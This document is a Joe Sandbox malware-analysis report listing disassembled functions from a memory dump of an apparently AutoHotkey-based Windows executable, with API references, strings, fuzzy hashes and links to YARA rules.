String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 578228273-457448710
Opcode ID: de1752a93e43fc0c095275b37ad3b552b58310ccad59a6b1c258ecfacbbbd951
Instruction ID: 4a5895365a7fcea1d2005f3acff7ee59181f16bc4f6896a7f3587883f5336dd3
Opcode Fuzzy Hash: de1752a93e43fc0c095275b37ad3b552b58310ccad59a6b1c258ecfacbbbd951
Instruction Fuzzy Hash: 65A11272614B4082FBA79F27E400BE96361E74DBD8F558222EF4E177B9DA78C846C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140049FF0 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 269COMMON

Download Yara Rule

Strings

ahk_parent, xrefs: 000000014004A034
Out of memory., xrefs: 000000014004A39A
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014004A12A

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Window$ForegroundVisible_errno_invalid_parameter_noinfo
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.$ahk_parent
API String ID: 1550069138-3360053881
Opcode ID: 791bcc1ef53e0924103ae573092697adfa925147c306770d5f1c8e343d19fa63
Instruction ID: ff04578fc3d4003793e6655bbdf5e4a15bc3961022ef3de59b51edcdf42d9f48
Opcode Fuzzy Hash: 791bcc1ef53e0924103ae573092697adfa925147c306770d5f1c8e343d19fa63
Instruction Fuzzy Hash: 0DB1A072704B4081EB139B2BE5103EAA391E78EBD4F594122FF5D177A9EA7CC882D744

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D4120 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000001400D4157
GetCurrentProcessId.KERNEL32 ref: 00000001400D4162
GetCurrentThreadId.KERNEL32 ref: 00000001400D416E
GetTickCount.KERNEL32 ref: 00000001400D417A
QueryPerformanceCounter.KERNEL32 ref: 00000001400D418B

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 54841a7e5d043fc96d74d71a08a47b5bdd7dbd32f6dc71d9de03125e16b84065
Instruction ID: a09a53a0c690d69a49a56e8977f733fe46465dd1812ff0193e5e5bc73d101388
Opcode Fuzzy Hash: 54841a7e5d043fc96d74d71a08a47b5bdd7dbd32f6dc71d9de03125e16b84065
Instruction Fuzzy Hash: 02016D32365A0086EB828F22E8843996360F74DBE0F446621EF9E47BB0DA38CDD58740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AE160 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00000001400AE1E3
FindFirstFileW.KERNEL32 ref: 00000001400AE215
FindClose.KERNEL32 ref: 00000001400AE224

Strings

\\?\, xrefs: 00000001400AE186

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID: \\?\
API String ID: 48322524-4282027825
Opcode ID: cecff236244209d76ea20281425bd61ef77e67c90f733c6f3633e603fb2a00c1
Instruction ID: 25bdd05c8f2998c15a5893cba9c3c2bff2c5efd81e04550325d234ba1d8e8826
Opcode Fuzzy Hash: cecff236244209d76ea20281425bd61ef77e67c90f733c6f3633e603fb2a00c1
Instruction Fuzzy Hash: A221D77670569181EF668F16E4443E563A1A768BE4F484320FF69076F4EB38CDC5CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140018080 Relevance: 4.6, APIs: 3, Instructions: 140keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32 ref: 0000000140018171
free.LIBCMT ref: 00000001400182B5
BlockInput.USER32 ref: 00000001400182D4

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: BlockInput$free
String ID:
API String ID: 984266599-0
Opcode ID: aa214f473a740cd7ac8d7dd1923d8d319f5244daf0beecebea246845b2fcc149
Instruction ID: 3bcf110e78db408238b800eec9046f4e7006e19437b52402031e98c36dfb7805
Opcode Fuzzy Hash: aa214f473a740cd7ac8d7dd1923d8d319f5244daf0beecebea246845b2fcc149
Instruction Fuzzy Hash: FD618C321086C08AE7BB8B17A8447EA7BA1F39D794F44411AEF951B6B5D73DCA44CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400BC190 Relevance: .6, Instructions: 584COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0007777e31e3ebcecc367cc973bfc2980347714b0f57bbe91462aad423ab86
Instruction ID: 3eb070914184f6cb0c1a58740e392ff3c8346199cb6a3897922b4fa1ef9ab2af
Opcode Fuzzy Hash: ab0007777e31e3ebcecc367cc973bfc2980347714b0f57bbe91462aad423ab86
Instruction Fuzzy Hash: EB329F36B10A91CAE7618FAAD440BED37B1F358BD8F554126EF6997BA8DB34C841C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005C0E0 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e96612901d6f8909945da2a85467c766e87d24992f0cf6bcf42f011046207e72
Instruction ID: 8af5cd857e509fd901747dc4cc987ff7ffe23108488fee7149ead2641eff3e4e
Opcode Fuzzy Hash: e96612901d6f8909945da2a85467c766e87d24992f0cf6bcf42f011046207e72
Instruction Fuzzy Hash: 4BD1CB72221B8489EB66CF67D554BE923E1FB4DBD4F448516EB0A077E5EB3AC881C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008C140 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 338COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000000014008C3DC
malloc.LIBCMT ref: 000000014008C423
malloc.LIBCMT ref: 000000014008C446

Strings

Parameter #1 invalid., xrefs: 000000014008C1CB
Could not create window., xrefs: 000000014008C531
Out of memory., xrefs: 000000014008C4AA
+LastFoundExist, xrefs: 000000014008C33C
Invalid Gui name., xrefs: 000000014008C1A1

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: malloc
String ID: +LastFoundExist$Could not create window.$Invalid Gui name.$Out of memory.$Parameter #1 invalid.
API String ID: 2803490479-3585094845
Opcode ID: fc11c4498e5dec7cf9fbd7dd79110698762216b4993d1498f8a92780a720ce5c
Instruction ID: 932bb247b58d38c51dbc46a9fe2a5ae706123f23d4297c4c70f6333c509ecd4b
Opcode Fuzzy Hash: fc11c4498e5dec7cf9fbd7dd79110698762216b4993d1498f8a92780a720ce5c
Instruction Fuzzy Hash: 42E15A72225B4581EA5A9F17E491BE973B4F78DFC0F484125EB4A0B7B5EF38CA498340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140043FE2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

wcsncpy.LIBCMT ref: 0000000140044030
CreateSolidBrush.GDI32 ref: 0000000140044104
CreateDCW.GDI32 ref: 00000001400443C7
GetDeviceCaps.GDI32 ref: 00000001400443D8
GetStockObject.GDI32 ref: 00000001400443E6
SelectObject.GDI32 ref: 00000001400443F5
GetTextFaceW.GDI32 ref: 000000014004440E
GetTextMetricsW.GDI32 ref: 000000014004441E

Strings

DISPLAY, xrefs: 00000001400443B8

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CreateObjectText$BrushCapsDeviceFaceMetricsSelectSolidStockwcsncpy
String ID: DISPLAY
API String ID: 1918898772-865373369
Opcode ID: 2629dc038928bed66374922351a5a93c07c3580437399966da7eb1b7cf568d43
Instruction ID: 907e279fcac2e39801c8a06dc077f34caba90cdc2bdc0f9c09f48020a4d53699
Opcode Fuzzy Hash: 2629dc038928bed66374922351a5a93c07c3580437399966da7eb1b7cf568d43
Instruction Fuzzy Hash: F781203260069086FB2A9F2294413ED33E1F798BDDF524529FB5607AF8EB38C990C744

Uniqueness

Uniqueness Score: -1.00%

Function 000000014009219C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 95windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00000001400921EA
GetWindowLongW.USER32 ref: 000000014009222B
SendMessageW.USER32 ref: 0000000140092255
SendMessageW.USER32 ref: 0000000140092271
SendMessageW.USER32 ref: 000000014009228E
SelectObject.GDI32 ref: 000000014009388C
ReleaseDC.USER32 ref: 000000014009389D

Strings

Can't create control., xrefs: 00000001400938B0
button, xrefs: 00000001400921DF

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$CreateLongObjectReleaseSelect
String ID: Can't create control.$button
API String ID: 841324528-1804316079
Opcode ID: 852378cdacdfa7696e6ca8031159c097b59655e2a1df86454152de0b7217c2e8
Instruction ID: bd8bf647582bbf6fca3fc36a834a0b6c9f1cedf2da7b4c0993d487093af01bad
Opcode Fuzzy Hash: 852378cdacdfa7696e6ca8031159c097b59655e2a1df86454152de0b7217c2e8
Instruction Fuzzy Hash: B1410876715A8086EB52CF2AE4847A973A0F78CB98F144122EF4D57B78DF39C985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D802C Relevance: 15.1, APIs: 10, Instructions: 123COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001400D8073
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D807F
_errno.LIBCMT ref: 00000001400D80C9
_errno.LIBCMT ref: 00000001400D80D4
_errno.LIBCMT ref: 00000001400D8106
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D8110
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001400D81FF), ref: 00000001400D8182
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001400D81FF), ref: 00000001400D819F
_errno.LIBCMT ref: 00000001400D81C5
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D81D1

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 2295021086-0
Opcode ID: f7e83ee9f2c68b7965d7f4bf84082b364ba246a12f2a3bba6266ccb3e6eaca42
Instruction ID: 6a2dcb02feb55ec248ae1d6cc3e201fe22b255e4e8706f50cb68b956545a83a6
Opcode Fuzzy Hash: f7e83ee9f2c68b7965d7f4bf84082b364ba246a12f2a3bba6266ccb3e6eaca42
Instruction Fuzzy Hash: 4A5198326057808AFBB79F66D4443EC3AB4AF487D4F144511FF5507AE5DB3884478721

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140084140 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 93windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(?,000000014008256D), ref: 0000000140084216
SysFreeString.OLEAUT32 ref: 00000001400842B2
SysFreeString.OLEAUT32 ref: 00000001400842BC
SysFreeString.OLEAUT32 ref: 00000001400842C6

Strings

Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d, xrefs: 0000000140084260
No valid COM object!, xrefs: 00000001400841B7
0x%08X - , xrefs: 00000001400841C3

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: FreeString$FormatMessage
String ID: Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d$0x%08X - $No valid COM object!
API String ID: 1522831054-3028990165
Opcode ID: 89c31aabcd22fd5ae992dca47e15637c02272ea44b6d5395a1584f5a82345337
Instruction ID: 4f8deb4f72dd2acf459051c55e846bda88d22ee218e31af3bb7ffc680f83590e
Opcode Fuzzy Hash: 89c31aabcd22fd5ae992dca47e15637c02272ea44b6d5395a1584f5a82345337
Instruction Fuzzy Hash: A441B43221879081EB359B26E4443E9B3A5FB9CBC8F484115EB8857BB9DF3CC585C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140044192 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

CreateDCW.GDI32 ref: 00000001400443C7
GetDeviceCaps.GDI32 ref: 00000001400443D8
GetStockObject.GDI32 ref: 00000001400443E6
SelectObject.GDI32 ref: 00000001400443F5
GetTextFaceW.GDI32 ref: 000000014004440E
GetTextMetricsW.GDI32 ref: 000000014004441E

Strings

DISPLAY, xrefs: 00000001400443B8

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: ObjectText$CapsCreateDeviceFaceMetricsSelectStock
String ID: DISPLAY
API String ID: 2440455471-865373369
Opcode ID: 3b6490cdb523d863b71ae46264d85c8950df8627e986df0f72bebb4d6d43ac2b
Instruction ID: a88ad51eab9cf9472562bfdfaf2b823180f10580f37f17e5a9fb8fab5af32e17
Opcode Fuzzy Hash: 3b6490cdb523d863b71ae46264d85c8950df8627e986df0f72bebb4d6d43ac2b
Instruction Fuzzy Hash: 1941D2356016418AFF7A8F26A4503E933A0F35CB9DF514029EF4A17BA8DB39CD81C784

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003C100 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 353COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 000000014003C1A5

Part of subcall function 00000001400CB11C: HeapFree.KERNEL32(?,?,00000000,00000001400CE840,?,?,00000000,00000001400CE863,?,?,?,00000001400CA78B,?,?,00000000,00000001400CFD1B), ref: 00000001400CB132
Part of subcall function 00000001400CB11C: _errno.LIBCMT ref: 00000001400CB13C
Part of subcall function 00000001400CB11C: GetLastError.KERNEL32(?,?,00000000,00000001400CE840,?,?,00000000,00000001400CE863,?,?,?,00000001400CA78B,?,?,00000000,00000001400CFD1B), ref: 00000001400CB144

Part of subcall function 0000000140032520: GlobalUnlock.KERNEL32 ref: 00000001400325E1
Part of subcall function 0000000140032520: CloseClipboard.USER32 ref: 00000001400325EE
Part of subcall function 0000000140032520: GetTickCount.KERNEL32 ref: 0000000140032601
Part of subcall function 0000000140032520: PeekMessageW.USER32 ref: 0000000140032635
Part of subcall function 0000000140032520: GetTickCount.KERNEL32 ref: 0000000140032649

free.LIBCMT ref: 000000014003C263
free.LIBCMT ref: 000000014003C4F1

Strings

_NewEnum, xrefs: 000000014003C225
Next, xrefs: 000000014003C28A

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: free$CountTick$ClipboardCloseErrorFreeGlobalHeapLastMessagePeekUnlock_errno
String ID: Next$_NewEnum
API String ID: 837015515-2558596721
Opcode ID: 0e42de6933edc6b9a24aa1a0c2d2662bb8ffef06cde564b77a18d14de9b95c00
Instruction ID: 6040ff2caa944945ff0235510103580c3bf39fcf066016c23246ac8ac624bf49
Opcode Fuzzy Hash: 0e42de6933edc6b9a24aa1a0c2d2662bb8ffef06cde564b77a18d14de9b95c00
Instruction Fuzzy Hash: 22F16D32229B4086EB678B66E490BEA73A4F78C7C4F544116FB8E87BB4DB38C555C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CE164 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001400CE183

Part of subcall function 00000001400CE858: _amsg_exit.LIBCMT ref: 00000001400CE86E

Part of subcall function 00000001400CDDA0: _getptd.LIBCMT ref: 00000001400CDDAA
Part of subcall function 00000001400CDDA0: _amsg_exit.LIBCMT ref: 00000001400CDE47

Part of subcall function 00000001400CDE5C: GetOEMCP.KERNEL32 ref: 00000001400CDE86

Part of subcall function 00000001400D0A70: malloc.LIBCMT ref: 00000001400D0A9B
Part of subcall function 00000001400D0A70: Sleep.KERNEL32(?,?,00000000,00000001400CF2DD,?,?,?,00000001400CF387,?,?,00000000,00000001400CE775,?,?,00000000,00000001400CE82C), ref: 00000001400D0AAE

free.LIBCMT ref: 00000001400CE20E

Part of subcall function 00000001400CB11C: HeapFree.KERNEL32(?,?,00000000,00000001400CE840,?,?,00000000,00000001400CE863,?,?,?,00000001400CA78B,?,?,00000000,00000001400CFD1B), ref: 00000001400CB132
Part of subcall function 00000001400CB11C: _errno.LIBCMT ref: 00000001400CB13C
Part of subcall function 00000001400CB11C: GetLastError.KERNEL32(?,?,00000000,00000001400CE840,?,?,00000000,00000001400CE863,?,?,?,00000001400CA78B,?,?,00000000,00000001400CFD1B), ref: 00000001400CB144

_lock.LIBCMT ref: 00000001400CE23E
free.LIBCMT ref: 00000001400CE2E1
free.LIBCMT ref: 00000001400CE30D
_errno.LIBCMT ref: 00000001400CE312

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
